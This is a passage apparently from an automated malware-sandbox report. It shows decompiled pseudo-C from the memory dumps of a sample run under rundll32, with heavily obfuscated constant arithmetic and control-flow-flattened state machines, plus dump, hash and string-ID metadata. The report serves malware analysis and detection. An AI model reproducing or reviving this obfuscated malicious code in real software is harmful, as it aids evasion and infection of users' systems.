                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							if(_t316 == 0xd7ced6e) {
                                                                                                                      								_t305 =  *0x6a3dfc; // 0x0
                                                                                                                      								_t306 = E00695B3B(_t316, _v112,  *((intOrPtr*)(_t342 + 4)),  *((intOrPtr*)(_t305 + 0x64)),  *_t342, _v116, _v40, _v120, _v16,  &_v12, _v12, _v124, _v72, _t316, _v44, _v48, _v76, _v80);
                                                                                                                      								_t352 =  &(_t352[0x10]);
                                                                                                                      								if(_t306 == _v108) {
                                                                                                                      									 *_t314 = _v16;
                                                                                                                      									_t340 = 1;
                                                                                                                      									 *((intOrPtr*)(_t314 + 4)) = _v12;
                                                                                                                      								} else {
                                                                                                                      									_t316 = 0xf392ab6;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t316 == 0xd86d689) {
                                                                                                                      									_push(_t316);
                                                                                                                      									_push(_t316);
                                                                                                                      									_t312 = E00687FF2(_v12);
                                                                                                                      									_v16 = _t312;
                                                                                                                      									if(_t312 != 0) {
                                                                                                                      										_t316 = 0xd7ced6e;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t316 != 0xf392ab6) {
                                                                                                                      										goto L14;
                                                                                                                      									} else {
                                                                                                                      										E00698519(_v84, _v20, _v16);
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L17:
                                                                                                                      						return _t340;
                                                                                                                      					}
                                                                                                                      					_t316 = 0x220b753;
                                                                                                                      					L14:
                                                                                                                      				} while (_t316 != 0xf4b6a65);
                                                                                                                      				goto L17;
                                                                                                                      			}




















































                                                                                                                      0x00000000
                                                                                                                      0x00687550
                                                                                                                      0x00687493
                                                                                                                      0x00687499
                                                                                                                      0x006874d4
                                                                                                                      0x006874d5
                                                                                                                      0x006874d6
                                                                                                                      0x006874db
                                                                                                                      0x006874e6
                                                                                                                      0x006874ec
                                                                                                                      0x00000000
                                                                                                                      0x006874ec
                                                                                                                      0x0068749b
                                                                                                                      0x006874a1
                                                                                                                      0x00000000
                                                                                                                      0x006874a7
                                                                                                                      0x006874b6
                                                                                                                      0x006874bb
                                                                                                                      0x006874a1
                                                                                                                      0x00687499
                                                                                                                      0x00687491
                                                                                                                      0x006875e4
                                                                                                                      0x006875f0
                                                                                                                      0x006875f0
                                                                                                                      0x006875be
                                                                                                                      0x006875c0
                                                                                                                      0x006875c0
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: [%L$hJ$n&$n|$n|$u$Y$mH
                                                                                                                      • API String ID: 0-2314355462
                                                                                                                      • Opcode ID: 591aba3bf56b764bda82044ca47641e41339a6a79bb5a0e1e8e36b1692b56d58
                                                                                                                      • Instruction ID: 3d5d68e0f2b735654d99877402a4b299099d4d835e5f014d3a452bb488164c86
                                                                                                                      • Opcode Fuzzy Hash: 591aba3bf56b764bda82044ca47641e41339a6a79bb5a0e1e8e36b1692b56d58
                                                                                                                      • Instruction Fuzzy Hash: 91D1FE721083819FC764CF65C48995BBBF2BBC4748F60891DF6A686260C7B6D549CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E0069C631(void* __ecx) {
                                                                                                                      				signed int _v4;
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				unsigned int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				void* _t214;
                                                                                                                      				void* _t220;
                                                                                                                      				void* _t224;
                                                                                                                      				void* _t228;
                                                                                                                      				void* _t229;
                                                                                                                      				void* _t233;
                                                                                                                      				void* _t234;
                                                                                                                      				signed int _t236;
                                                                                                                      				signed int _t237;
                                                                                                                      				signed int _t238;
                                                                                                                      				void* _t248;
                                                                                                                      				void* _t249;
                                                                                                                      				signed int* _t251;
                                                                                                                      				void* _t254;
                                                                                                                      
                                                                                                                      				_t251 =  &_v92;
                                                                                                                      				_t234 = __ecx;
                                                                                                                      				_v56 = 0x6c25e6;
                                                                                                                      				_v56 = _v56 >> 0xf;
                                                                                                                      				_v56 = _v56 >> 0xd;
                                                                                                                      				_v56 = _v56 ^ 0x000b07b8;
                                                                                                                      				_v60 = 0xfeb19f;
                                                                                                                      				_v60 = _v60 | 0xe5cfed25;
                                                                                                                      				_v60 = _v60 ^ 0x26a25afc;
                                                                                                                      				_v60 = _v60 ^ 0xc355f8a5;
                                                                                                                      				_v20 = 0x71f317;
                                                                                                                      				_v20 = _v20 >> 1;
                                                                                                                      				_v20 = _v20 ^ 0x003a157d;
                                                                                                                      				_v64 = 0x229c82;
                                                                                                                      				_v64 = _v64 >> 6;
                                                                                                                      				_v64 = _v64 + 0x6845;
                                                                                                                      				_v64 = _v64 ^ 0x000e1a2d;
                                                                                                                      				_v80 = 0xaa3c23;
                                                                                                                      				_v80 = _v80 + 0x9f20;
                                                                                                                      				_v80 = _v80 + 0x8b23;
                                                                                                                      				_v80 = _v80 | 0x21cd8be9;
                                                                                                                      				_v80 = _v80 ^ 0x21ed2977;
                                                                                                                      				_v84 = 0xa275e1;
                                                                                                                      				_v84 = _v84 >> 0xd;
                                                                                                                      				_t248 = 0;
                                                                                                                      				_t236 = 0x36;
                                                                                                                      				_v84 = _v84 / _t236;
                                                                                                                      				_v84 = _v84 | 0x6f301759;
                                                                                                                      				_t249 = 0xe982267;
                                                                                                                      				_v84 = _v84 ^ 0x6f339045;
                                                                                                                      				_v88 = 0x6e61be;
                                                                                                                      				_v88 = _v88 ^ 0xaf54e0d1;
                                                                                                                      				_v88 = _v88 >> 4;
                                                                                                                      				_v88 = _v88 | 0xfa70c1e6;
                                                                                                                      				_v88 = _v88 ^ 0xfaf0db59;
                                                                                                                      				_v8 = 0x2c245a;
                                                                                                                      				_v8 = _v8 << 8;
                                                                                                                      				_v8 = _v8 ^ 0x2c2bf9b3;
                                                                                                                      				_v36 = 0xcb696d;
                                                                                                                      				_v36 = _v36 >> 4;
                                                                                                                      				_v36 = _v36 << 5;
                                                                                                                      				_v36 = _v36 ^ 0x019dc7aa;
                                                                                                                      				_v76 = 0xb5019c;
                                                                                                                      				_v76 = _v76 + 0xffffd3ce;
                                                                                                                      				_t237 = 0x3a;
                                                                                                                      				_v76 = _v76 / _t237;
                                                                                                                      				_v76 = _v76 + 0xe675;
                                                                                                                      				_v76 = _v76 ^ 0x000db5c6;
                                                                                                                      				_v40 = 0x1e681a;
                                                                                                                      				_t238 = 0x22;
                                                                                                                      				_v40 = _v40 / _t238;
                                                                                                                      				_v40 = _v40 + 0x9449;
                                                                                                                      				_v40 = _v40 ^ 0x00094c29;
                                                                                                                      				_v12 = 0x15a3d6;
                                                                                                                      				_v12 = _v12 * 0x6f;
                                                                                                                      				_v12 = _v12 ^ 0x096cbb26;
                                                                                                                      				_v44 = 0x420567;
                                                                                                                      				_v44 = _v44 * 0x2b;
                                                                                                                      				_v44 = _v44 >> 8;
                                                                                                                      				_v44 = _v44 ^ 0x0004b329;
                                                                                                                      				_v24 = 0xd75fdc;
                                                                                                                      				_v24 = _v24 + 0x1e6b;
                                                                                                                      				_v24 = _v24 ^ 0x00df7832;
                                                                                                                      				_v92 = 0x2978f4;
                                                                                                                      				_v92 = _v92 ^ 0x1aa3462f;
                                                                                                                      				_v92 = _v92 * 0x3a;
                                                                                                                      				_v92 = _v92 | 0xa828e589;
                                                                                                                      				_v92 = _v92 ^ 0xab738ef3;
                                                                                                                      				_v28 = 0xea47cd;
                                                                                                                      				_v28 = _v28 * 0x68;
                                                                                                                      				_v28 = _v28 ^ 0x5f2069e4;
                                                                                                                      				_v16 = 0x52c32f;
                                                                                                                      				_v16 = _v16 | 0xda6d254c;
                                                                                                                      				_v16 = _v16 ^ 0xda7308ab;
                                                                                                                      				_v48 = 0xc39de2;
                                                                                                                      				_v48 = _v48 ^ 0x402eeacb;
                                                                                                                      				_v48 = _v48 + 0xb85a;
                                                                                                                      				_v48 = _v48 ^ 0x40eaab85;
                                                                                                                      				_v52 = 0xbb994d;
                                                                                                                      				_v52 = _v52 | 0x0bb22e40;
                                                                                                                      				_v52 = _v52 ^ 0x7c36a9dd;
                                                                                                                      				_v52 = _v52 ^ 0x7782b78d;
                                                                                                                      				_v68 = 0x6ee7f1;
                                                                                                                      				_v68 = _v68 * 3;
                                                                                                                      				_v68 = _v68 * 0x65;
                                                                                                                      				_v68 = _v68 + 0xffffc283;
                                                                                                                      				_v68 = _v68 ^ 0x834839c0;
                                                                                                                      				_v4 = 0x2c076e;
                                                                                                                      				_v4 = _v4 >> 2;
                                                                                                                      				_v4 = _v4 ^ 0x00027705;
                                                                                                                      				_v32 = 0x2be47d;
                                                                                                                      				_v32 = _v32 >> 3;
                                                                                                                      				_v32 = _v32 << 0x10;
                                                                                                                      				_v32 = _v32 ^ 0x7c8953c8;
                                                                                                                      				_v72 = 0x664751;
                                                                                                                      				_v72 = _v72 + 0xffffb67a;
                                                                                                                      				_v72 = _v72 + 0xf05a;
                                                                                                                      				_v72 = _v72 + 0xffff370a;
                                                                                                                      				_v72 = _v72 ^ 0x0066b29b;
                                                                                                                      				goto L1;
                                                                                                                      				do {
                                                                                                                      					while(1) {
                                                                                                                      						L1:
                                                                                                                      						_t254 = _t249 - 0xe145aac;
                                                                                                                      						if(_t254 > 0) {
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      						if(_t254 == 0) {
                                                                                                                      							_push(_t238);
                                                                                                                      							_push(_t238);
                                                                                                                      							_t220 = E0068474B();
                                                                                                                      							_t251 =  &(_t251[2]);
                                                                                                                      							_t249 = 0x70e2d06;
                                                                                                                      							_t248 = _t248 + _t220;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t249 == 0x15047ce) {
                                                                                                                      								_push(_t238);
                                                                                                                      								_push(_t238);
                                                                                                                      								_t224 = E0068474B();
                                                                                                                      								_t251 =  &(_t251[2]);
                                                                                                                      								_t249 = 0xe32aaf2;
                                                                                                                      								_t248 = _t248 + _t224;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t249 == 0x4d33fe3) {
                                                                                                                      									_push(_t238);
                                                                                                                      									_push(_t238);
                                                                                                                      									_t228 = E0068474B();
                                                                                                                      									_t251 =  &(_t251[2]);
                                                                                                                      									_t249 = 0xe45b300;
                                                                                                                      									_t248 = _t248 + _t228;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									if(_t249 == 0x708a22e) {
                                                                                                                      										_t238 = _v56;
                                                                                                                      										_t229 = E0069C2F8(_t238, _t234 + 0x1c, _v60, _v20, _v64);
                                                                                                                      										_t251 =  &(_t251[3]);
                                                                                                                      										_t249 = 0x15047ce;
                                                                                                                      										_t248 = _t248 + _t229;
                                                                                                                      										continue;
                                                                                                                      									} else {
                                                                                                                      										if(_t249 != 0x70e2d06) {
                                                                                                                      											goto L17;
                                                                                                                      										} else {
                                                                                                                      											_push(_t238);
                                                                                                                      											_push(_t238);
                                                                                                                      											_t233 = E0068474B();
                                                                                                                      											_t251 =  &(_t251[2]);
                                                                                                                      											_t249 = 0x4d33fe3;
                                                                                                                      											_t248 = _t248 + _t233;
                                                                                                                      											continue;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L20:
                                                                                                                      						return _t248;
                                                                                                                      					}
                                                                                                                      					if(_t249 == 0xe32aaf2) {
                                                                                                                      						_push(_t238);
                                                                                                                      						_push(_t238);
                                                                                                                      						_t214 = E0068474B();
                                                                                                                      						_t251 =  &(_t251[2]);
                                                                                                                      						_t249 = 0xe145aac;
                                                                                                                      						_t248 = _t248 + _t214;
                                                                                                                      						goto L17;
                                                                                                                      					} else {
                                                                                                                      						if(_t249 == 0xe45b300) {
                                                                                                                      							_t248 = _t248 + E0069C2F8(_v68, _t234 + 0x14, _v4, _v32, _v72);
                                                                                                                      						} else {
                                                                                                                      							if(_t249 != 0xe982267) {
                                                                                                                      								goto L17;
                                                                                                                      							} else {
                                                                                                                      								_t249 = 0x708a22e;
                                                                                                                      								goto L1;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					goto L20;
                                                                                                                      					L17:
                                                                                                                      				} while (_t249 != 0xce30a1f);
                                                                                                                      				goto L20;
                                                                                                                      			}

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )L$Eh$QGf$Z$,$w)!$}+$%l$i _
                                                                                                                      • API String ID: 0-1553751006
                                                                                                                      • Opcode ID: 24a842ca848367424d792b2c1ed1d107ee6d6e6c77a466d1125fff4a40fa415b
                                                                                                                      • Instruction ID: f0ff06b49c361b8a100ce590f81f18cae76059863496bab946291b0a730880d9
                                                                                                                      • Opcode Fuzzy Hash: 24a842ca848367424d792b2c1ed1d107ee6d6e6c77a466d1125fff4a40fa415b
                                                                                                                      • Instruction Fuzzy Hash: 65A142B28083419FC798CF29D48A44FFBE6BB95798F504A1DF59596220D3B5CA09CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E0069F435(intOrPtr* __ecx, signed int __edx) {
                                                                                                                      				char _v128;
                                                                                                                      				char _v256;
                                                                                                                      				char _v288;
                                                                                                                      				intOrPtr _v292;
                                                                                                                      				signed int _v296;
                                                                                                                      				signed int _v300;
                                                                                                                      				signed int _v304;
                                                                                                                      				signed int _v308;
                                                                                                                      				signed int _v312;
                                                                                                                      				signed int _v316;
                                                                                                                      				signed int _v320;
                                                                                                                      				signed int _v324;
                                                                                                                      				signed int _v328;
                                                                                                                      				signed int _v332;
                                                                                                                      				signed int _v336;
                                                                                                                      				signed int _v340;
                                                                                                                      				signed int _v344;
                                                                                                                      				signed int _v348;
                                                                                                                      				signed int _v352;
                                                                                                                      				signed int _v356;
                                                                                                                      				signed int _v360;
                                                                                                                      				signed int _v364;
                                                                                                                      				signed int _v368;
                                                                                                                      				signed int _v372;
                                                                                                                      				signed int _v376;
                                                                                                                      				signed int _v380;
                                                                                                                      				signed int _v384;
                                                                                                                      				signed int _v388;
                                                                                                                      				signed int _v392;
                                                                                                                      				signed int _v396;
                                                                                                                      				signed int _v400;
                                                                                                                      				signed int _v404;
                                                                                                                      				signed int _v408;
                                                                                                                      				signed int _v412;
                                                                                                                      				signed int _v416;
                                                                                                                      				signed int _v420;
                                                                                                                      				signed int _v424;
                                                                                                                      				signed int _v428;
                                                                                                                      				signed int _v432;
                                                                                                                      				signed int _v436;
                                                                                                                      				signed int _v440;
                                                                                                                      				signed int _v444;
                                                                                                                      				signed int _v448;
                                                                                                                      				signed int _v452;
                                                                                                                      				intOrPtr* _v456;
                                                                                                                      				signed int _v460;
                                                                                                                      				signed int _v464;
                                                                                                                      				signed int _v468;
                                                                                                                      				signed int _v472;
                                                                                                                      				signed int _v476;
                                                                                                                      				signed int _v480;
                                                                                                                      				signed int _v484;
                                                                                                                      				signed int _v488;
                                                                                                                      				signed int _v492;
                                                                                                                      				signed int _v496;
                                                                                                                      				signed int _v500;
                                                                                                                      				signed int _v504;
                                                                                                                      				signed int _v508;
                                                                                                                      				signed int _v512;
                                                                                                                      				signed int _v516;
                                                                                                                      				signed int _v520;
                                                                                                                      				void* _t551;
                                                                                                                      				void* _t554;
                                                                                                                      				signed int _t560;
                                                                                                                      				void* _t563;
                                                                                                                      				int _t566;
                                                                                                                      				void* _t580;
                                                                                                                      				signed int* _t582;
                                                                                                                      				void* _t587;
                                                                                                                      				signed int _t595;
                                                                                                                      				void* _t598;
                                                                                                                      				signed int _t601;
                                                                                                                      				signed int _t602;
                                                                                                                      				signed int _t603;
                                                                                                                      				intOrPtr* _t610;
                                                                                                                      				signed int _t634;
                                                                                                                      				void* _t659;
                                                                                                                      				signed int _t675;
                                                                                                                      				signed int _t676;
                                                                                                                      				signed int _t677;
                                                                                                                      				signed int _t678;
                                                                                                                      				signed int _t679;
                                                                                                                      				signed int _t680;
                                                                                                                      				void* _t682;
                                                                                                                      				void* _t683;
                                                                                                                      				void* _t686;
                                                                                                                      				void* _t687;
                                                                                                                      				signed int _t692;
                                                                                                                      				signed int _t693;
                                                                                                                      				signed int* _t694;
                                                                                                                      				void* _t698;
                                                                                                                      
                                                                                                                      				_t694 =  &_v520;
                                                                                                                      				_v296 = __edx;
                                                                                                                      				_v456 = __ecx;
                                                                                                                      				_v308 = 0x7c82e0;
                                                                                                                      				_v308 = _v308 ^ 0x9529f8b7;
                                                                                                                      				_v308 = _v308 ^ 0x95557a57;
                                                                                                                      				_v444 = 0xbd655a;
                                                                                                                      				_v444 = _v444 + 0x6586;
                                                                                                                      				_v444 = _v444 + 0xffff1486;
                                                                                                                      				_v444 = _v444 ^ 0x00b10b5d;
                                                                                                                      				_v360 = 0x6df28f;
                                                                                                                      				_v360 = _v360 >> 0xc;
                                                                                                                      				_v360 = _v360 ^ 0xc93a0f00;
                                                                                                                      				_v360 = _v360 ^ 0xc93b57a7;
                                                                                                                      				_v380 = 0x803da4;
                                                                                                                      				_v380 = _v380 + 0x81b0;
                                                                                                                      				_v380 = _v380 << 0x10;
                                                                                                                      				_v380 = _v380 ^ 0xbf59b73f;
                                                                                                                      				_v484 = 0xdeaf13;
                                                                                                                      				_v484 = _v484 | 0x05ba16e8;
                                                                                                                      				_v484 = _v484 + 0xffff5e7b;
                                                                                                                      				_v484 = _v484 + 0x21a5;
                                                                                                                      				_v484 = _v484 ^ 0x05f35408;
                                                                                                                      				_v516 = 0x9c12e3;
                                                                                                                      				_v516 = _v516 >> 5;
                                                                                                                      				_v516 = _v516 + 0x3879;
                                                                                                                      				_t686 = 0x618a3a9;
                                                                                                                      				_t676 = 0x46;
                                                                                                                      				_v516 = _v516 / _t676;
                                                                                                                      				_v516 = _v516 ^ 0x000beb5e;
                                                                                                                      				_v404 = 0x49e9fe;
                                                                                                                      				_v404 = _v404 + 0x1375;
                                                                                                                      				_v404 = _v404 | 0x014362a3;
                                                                                                                      				_v404 = _v404 ^ 0x01430578;
                                                                                                                      				_v408 = 0xd49d0c;
                                                                                                                      				_v408 = _v408 + 0x89ee;
                                                                                                                      				_v408 = _v408 | 0xbbfa4d8a;
                                                                                                                      				_v408 = _v408 ^ 0xbbf95772;
                                                                                                                      				_v504 = 0x33cefe;
                                                                                                                      				_v504 = _v504 >> 0xa;
                                                                                                                      				_v504 = _v504 >> 0xd;
                                                                                                                      				_v504 = _v504 + 0xffff4738;
                                                                                                                      				_v504 = _v504 ^ 0xfff61340;
                                                                                                                      				_v388 = 0x38423a;
                                                                                                                      				_t75 =  &_v388; // 0x38423a
                                                                                                                      				_t601 = 0x7b;
                                                                                                                      				_v388 =  *_t75 * 0x2c;
                                                                                                                      				_v388 = _v388 + 0x7a90;
                                                                                                                      				_v388 = _v388 ^ 0x09a92ca6;
                                                                                                                      				_v396 = 0x89c34a;
                                                                                                                      				_v396 = _v396 >> 6;
                                                                                                                      				_v396 = _v396 | 0xaa955d3e;
                                                                                                                      				_v396 = _v396 ^ 0xaa9cf099;
                                                                                                                      				_v316 = 0x54e1fb;
                                                                                                                      				_v316 = _v316 + 0xffff88b2;
                                                                                                                      				_v316 = _v316 ^ 0x0053b1cb;
                                                                                                                      				_v392 = 0xd67855;
                                                                                                                      				_v392 = _v392 + 0xd739;
                                                                                                                      				_v392 = _v392 * 0x34;
                                                                                                                      				_v392 = _v392 ^ 0x2bb8cf2c;
                                                                                                                      				_v512 = 0x9dc1ac;
                                                                                                                      				_v512 = _v512 | 0xff1b5e8c;
                                                                                                                      				_v512 = _v512 / _t601;
                                                                                                                      				_v512 = _v512 + 0xc237;
                                                                                                                      				_v512 = _v512 ^ 0x02115509;
                                                                                                                      				_v368 = 0xb0c27;
                                                                                                                      				_v368 = _v368 * 0x3a;
                                                                                                                      				_v368 = _v368 + 0x9417;
                                                                                                                      				_v368 = _v368 ^ 0x028ae81d;
                                                                                                                      				_v352 = 0x7ea940;
                                                                                                                      				_v352 = _v352 + 0xffff6a40;
                                                                                                                      				_v352 = _v352 | 0x1d7a7563;
                                                                                                                      				_v352 = _v352 ^ 0x1d74a207;
                                                                                                                      				_v340 = 0xd37cb9;
                                                                                                                      				_v340 = _v340 >> 5;
                                                                                                                      				_v340 = _v340 ^ 0x00021b7e;
                                                                                                                      				_v384 = 0xc54f7c;
                                                                                                                      				_v384 = _v384 | 0xe1c129a4;
                                                                                                                      				_v384 = _v384 << 6;
                                                                                                                      				_v384 = _v384 ^ 0x7152788e;
                                                                                                                      				_v320 = 0xafdf9b;
                                                                                                                      				_v320 = _v320 | 0x588bef45;
                                                                                                                      				_v320 = _v320 ^ 0x58ad1127;
                                                                                                                      				_v508 = 0x7882a6;
                                                                                                                      				_v508 = _v508 ^ 0x5ae648f7;
                                                                                                                      				_t677 = 0x7e;
                                                                                                                      				_v508 = _v508 / _t677;
                                                                                                                      				_v508 = _v508 + 0xffff266f;
                                                                                                                      				_v508 = _v508 ^ 0x00b4570c;
                                                                                                                      				_v344 = 0x25ec7c;
                                                                                                                      				_t158 =  &_v344; // 0x25ec7c
                                                                                                                      				_t692 = 0x77;
                                                                                                                      				_v344 =  *_t158 * 0x48;
                                                                                                                      				_v344 = _v344 ^ 0x0aab681c;
                                                                                                                      				_v332 = 0xac456;
                                                                                                                      				_v332 = _v332 ^ 0x143b2d92;
                                                                                                                      				_v332 = _v332 ^ 0x1438ce6d;
                                                                                                                      				_v436 = 0x1dd68;
                                                                                                                      				_v436 = _v436 + 0x1e14;
                                                                                                                      				_v436 = _v436 / _t692;
                                                                                                                      				_v436 = _v436 ^ 0x000407e3;
                                                                                                                      				_v468 = 0x975814;
                                                                                                                      				_v468 = _v468 | 0x165c3dad;
                                                                                                                      				_v468 = _v468 >> 3;
                                                                                                                      				_v468 = _v468 + 0x9a99;
                                                                                                                      				_v468 = _v468 ^ 0x02d4af38;
                                                                                                                      				_v428 = 0xd1fa32;
                                                                                                                      				_v428 = _v428 + 0x34cd;
                                                                                                                      				_v428 = _v428 >> 0xa;
                                                                                                                      				_v428 = _v428 ^ 0x000c7c43;
                                                                                                                      				_v372 = 0xb93604;
                                                                                                                      				_v372 = _v372 >> 0xb;
                                                                                                                      				_v372 = _v372 + 0x569f;
                                                                                                                      				_v372 = _v372 ^ 0x0001c97c;
                                                                                                                      				_v312 = 0xb8b780;
                                                                                                                      				_v312 = _v312 / _t601;
                                                                                                                      				_v312 = _v312 ^ 0x0009bb57;
                                                                                                                      				_v364 = 0xc6b8c5;
                                                                                                                      				_v364 = _v364 >> 4;
                                                                                                                      				_v364 = _v364 << 0xf;
                                                                                                                      				_v364 = _v364 ^ 0x35c8234d;
                                                                                                                      				_v500 = 0x5d2db3;
                                                                                                                      				_v500 = _v500 | 0xa4ec7bca;
                                                                                                                      				_v500 = _v500 * 0x42;
                                                                                                                      				_v500 = _v500 + 0xffff6871;
                                                                                                                      				_v500 = _v500 ^ 0x8955fb09;
                                                                                                                      				_v492 = 0xf8ac1c;
                                                                                                                      				_v492 = _v492 + 0xd489;
                                                                                                                      				_v492 = _v492 | 0x938b5662;
                                                                                                                      				_v492 = _v492 << 6;
                                                                                                                      				_v492 = _v492 ^ 0xfef6fac0;
                                                                                                                      				_v356 = 0x80a8a7;
                                                                                                                      				_v356 = _v356 >> 3;
                                                                                                                      				_v356 = _v356 + 0xffff1aa9;
                                                                                                                      				_v356 = _v356 ^ 0x00023cc5;
                                                                                                                      				_v420 = 0x29f504;
                                                                                                                      				_v420 = _v420 ^ 0x96d25191;
                                                                                                                      				_v420 = _v420 << 0xa;
                                                                                                                      				_v420 = _v420 ^ 0xee96722c;
                                                                                                                      				_v476 = 0x6526e6;
                                                                                                                      				_t250 =  &_v476; // 0x6526e6
                                                                                                                      				_t602 = 9;
                                                                                                                      				_t678 = 0x5e;
                                                                                                                      				_v476 =  *_t250 * 0x65;
                                                                                                                      				_t252 =  &_v476; // 0x6526e6
                                                                                                                      				_v476 =  *_t252 * 0x5d;
                                                                                                                      				_v476 = _v476 + 0xffffa50d;
                                                                                                                      				_v476 = _v476 ^ 0x7f6d4504;
                                                                                                                      				_v304 = 0x6f90;
                                                                                                                      				_v304 = _v304 + 0xffffb625;
                                                                                                                      				_v304 = _v304 ^ 0x0000ce69;
                                                                                                                      				_v348 = 0xd48165;
                                                                                                                      				_v348 = _v348 * 0x4f;
                                                                                                                      				_v348 = _v348 + 0xa298;
                                                                                                                      				_v348 = _v348 ^ 0x41980148;
                                                                                                                      				_v412 = 0x7e685b;
                                                                                                                      				_t271 =  &_v412; // 0x7e685b
                                                                                                                      				_v412 =  *_t271 * 0x1d;
                                                                                                                      				_v412 = _v412 >> 0xe;
                                                                                                                      				_v412 = _v412 ^ 0x000f1110;
                                                                                                                      				_v460 = 0xd80dae;
                                                                                                                      				_v460 = _v460 * 0x4a;
                                                                                                                      				_v460 = _v460 << 9;
                                                                                                                      				_v460 = _v460 >> 5;
                                                                                                                      				_v460 = _v460 ^ 0x073a202e;
                                                                                                                      				_v324 = 0x2acd4f;
                                                                                                                      				_v324 = _v324 ^ 0x1744d618;
                                                                                                                      				_v324 = _v324 ^ 0x1766082c;
                                                                                                                      				_v400 = 0xe6723b;
                                                                                                                      				_v400 = _v400 ^ 0x220d80d9;
                                                                                                                      				_v400 = _v400 ^ 0x0161a8c1;
                                                                                                                      				_v400 = _v400 ^ 0x238d1a3c;
                                                                                                                      				_v376 = 0xaaa6;
                                                                                                                      				_v376 = _v376 + 0xd31a;
                                                                                                                      				_v376 = _v376 + 0xfffff53b;
                                                                                                                      				_v376 = _v376 ^ 0x00079406;
                                                                                                                      				_v452 = 0xe6cc76;
                                                                                                                      				_v452 = _v452 ^ 0xa4c29e28;
                                                                                                                      				_v452 = _v452 / _t602;
                                                                                                                      				_v452 = _v452 ^ 0x123fe3c8;
                                                                                                                      				_v520 = 0x822cac;
                                                                                                                      				_v520 = _v520 / _t678;
                                                                                                                      				_v520 = _v520 << 4;
                                                                                                                      				_v520 = _v520 << 9;
                                                                                                                      				_v520 = _v520 ^ 0x2c5f9d39;
                                                                                                                      				_v440 = 0xafb195;
                                                                                                                      				_v440 = _v440 + 0xffff123a;
                                                                                                                      				_v440 = _v440 >> 0xa;
                                                                                                                      				_v440 = _v440 ^ 0x0003dc41;
                                                                                                                      				_v448 = 0xdf86e4;
                                                                                                                      				_v448 = _v448 ^ 0xac60bb5d;
                                                                                                                      				_v448 = _v448 ^ 0x5238faed;
                                                                                                                      				_v448 = _v448 ^ 0xfe8be764;
                                                                                                                      				_v336 = 0x3e14c9;
                                                                                                                      				_v336 = _v336 << 7;
                                                                                                                      				_v336 = _v336 ^ 0x1f0fc953;
                                                                                                                      				_v496 = 0x4885f3;
                                                                                                                      				_v496 = _v496 * 0x25;
                                                                                                                      				_v496 = _v496 + 0x3aa8;
                                                                                                                      				_v496 = _v496 + 0xffff73aa;
                                                                                                                      				_v496 = _v496 ^ 0x0a7b30ee;
                                                                                                                      				_v480 = 0xca6b34;
                                                                                                                      				_v480 = _v480 >> 9;
                                                                                                                      				_v480 = _v480 + 0xfb6a;
                                                                                                                      				_v480 = _v480 / _t692;
                                                                                                                      				_v480 = _v480 ^ 0x000164ed;
                                                                                                                      				_v432 = 0xb19133;
                                                                                                                      				_t679 = 0x63;
                                                                                                                      				_t693 = _v296;
                                                                                                                      				_v432 = _v432 * 0x53;
                                                                                                                      				_v432 = _v432 >> 0x10;
                                                                                                                      				_v432 = _v432 ^ 0x00018cb4;
                                                                                                                      				_v328 = 0xdb466c;
                                                                                                                      				_t603 = _v296;
                                                                                                                      				_v328 = _v328 / _t679;
                                                                                                                      				_v328 = _v328 ^ 0x000e2190;
                                                                                                                      				_v488 = 0xd48740;
                                                                                                                      				_t680 = 0x44;
                                                                                                                      				_v488 = _v488 * 7;
                                                                                                                      				_v488 = _v488 * 0x66;
